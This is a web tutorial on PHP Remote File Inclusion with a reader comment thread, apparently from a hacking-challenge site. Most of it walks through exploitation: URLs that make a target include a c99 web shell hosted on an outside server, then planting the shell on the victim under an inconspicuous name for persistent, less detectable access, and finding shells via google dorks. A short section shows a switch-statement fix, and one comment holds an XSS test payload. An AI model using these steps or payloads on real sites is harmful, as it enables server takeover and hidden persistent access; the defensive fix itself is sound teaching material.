ThisisLegal.com
 

Remote File Inclusion

Remote File Inclusion (RFI) is a method used to gain full access to a website or server. The exploit relies on the PHP include() function which can be unsecure if not sanitized. Sites using this function will usually have links similar to:

index.php?file=something
index.php?page=something

If this isn't sanitized properly, the script doesn't check where the file is coming from and so an inclusion from an external location containing PHP code will be accepted and run natively on the server. This means that a text file containing a PHP script can be hosted on another server but run on the site being targeted.

This is where web shells come in. A web shell is a script that can handle simple tasks such as uploading, deleting and executing commands (such as SQL). The most common shell being the c99 but others are available such as the r57 and c100. This basically means that if you get a web shell to execute on an unprotected site, you will have full control over that site and/or server.

There are two types of PHP code vulnerable to this and each requires a slightly different method. You can't really know which is being used, so you simply try both methods. The vulnerable PHP code could look similar to the following:

<?php 
$page 
$_GET['page']; 
include(
$page);
?>
<?php 
$page 
$_GET['page']; 
include(
$page ".php");
?>

How to do this

If you have found a vulnerable site, this is how to exploit it. Firstly you need to upload your shell as a text file or find one already available online. For this I will use www.site.com/c99.txt. Then all you do is simply put this link at the end of you vulnerable site. I will use www.example.com. So the final strings to run the web shell are:

Example 1:

www.example.com/index.php?file=http://www.site.com/c99.txt

Example 2:

www.example.com/index.php?file=http://www.site.com/c99.txt?
(the question mark should be at the end)


This will execute in the PHP like so:

Example 1:

<?php include('http://www.site.com/c99.txt'); ?>

Example 2:

<?php include('http://www.site.com/c99.txt?.php'); ?>


Have access?

If you have a web shell on the site, but want to make sure you still have access if the owner changes the php script you could upload your shell to their site. Save the text file and rename it from .txt to .php then simply upload it using the shell you already have on the site (www.site.com/index.php?file=http://www.site.com/c99.txt?)

But be sure to name it something that is less obvious than c99.php so that it is less detectable. Look around files for naming conventions.

What a shell looks like

A c99.txt shell example can be found here. If you are using a c99 shell and are successful you will be displayed with a page that has:

At the top: "Safe-mode: OFF (not secure)"

Below "upload" and "make file" it says: "[ ok ]"

This means that you would have complete control over the site. A few google dorks can easily find you a real shell as this is currently a common attack method.

Protect yourself

Want to still use the index.php?file= format but make sure your site isn't vulnerable to RFI? No problem, just use the "switch" statement that defines the pages before hand. The code is shown below:

<?php 
$page 
$_GET["page"];
switch(
$page) { 
  case 
"page1"
    include(
"page1.php"); 
  break; 
  case 
"page2"
    include(
"page2.php"); 
  break; 
  default: 
// default action if nothing is passed through 
    
include("home.php"); 
  break; 

?>

That concludes this tutorial. Be sure to look out for site challenges with a similar URL format.


Comments

Reply

this is very nice!

Reply

Sweet, thanks. This was Helpful.

Reply

let me try it

Reply

damn, it hardly works anywhere nowdays

Reply

nice !

Reply

its not working

Reply

Please tell me how to enter these sql scripts on webpage or login page. Are these enter after link address. My email is : dragonabv@gmail.com

Reply

I am trying this method for Challenge 3 but nothing is happening... !?!?!?!?!?!?

Reply

need help with this..... having difficulities..... email chopperman2000p@hotmail.com

Reply

406 error?

Reply

nothing happening....do i need my own website for this to work??

email: funny.man76@yahoo.com

Reply

Does it not work in some browsers

Reply

I got it to work, but im not quite sure why it works. I haven't taken any formal classes in java, php, and or pearl. Just "C". I like the tutorial, but when a computer does something I don't understand it drives me bug shit. lol you just gave me many c affine filled nights.

Reply

"><script>alert('Would\'nt be just funny if this worked on this website?')</script>